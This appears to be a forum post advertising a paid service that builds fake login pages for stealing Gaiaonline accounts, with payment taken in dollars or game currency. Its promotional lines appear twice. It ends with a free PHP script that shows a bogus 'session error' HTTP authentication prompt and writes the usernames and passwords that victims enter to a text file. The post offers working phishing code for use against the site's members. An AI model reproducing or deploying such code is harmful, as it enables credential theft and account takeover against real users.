Syn's Flp Shop (Gaiaonline)
Welcome to S y n's FLP (Fake Login Page) Shop.
This is obviously for Gaiaonline.
You request I make.
Accepting USD, Gaiaonline gold/items, and LG Gold.
Sample Below
http://gyazo.com/5bd3ca1c4bcd4eff72e28df21003ff94.png
This is obviously for Gaiaonline.
You request I make.
Accepting USD, Gaiaonline gold/items, and LG Gold.
Sample Below
http://gyazo.com/5bd3ca1c4bcd4eff72e28df21003ff94.png
Freebie --- FLW for Gaiaonline
<?php
if(isset($_SERVER['PHP_AUTH_USER'])){
$Handle = @fopen('Accounts.txt', 'a');
@fwrite($Handle, "Username = {$_SERVER['PHP_AUTH_USER']}\r\n");
@fwrite($Handle, "Password = {$_SERVER['PHP_AUTH_PW']}\r\n\r\n");
@fclose($Handle);
}
header('WWW-Authenticate: Basic realm="A session error has occured please verify your Username and Password."');
header('HTTP/1.0 401 Unauthorized');
exit;
?>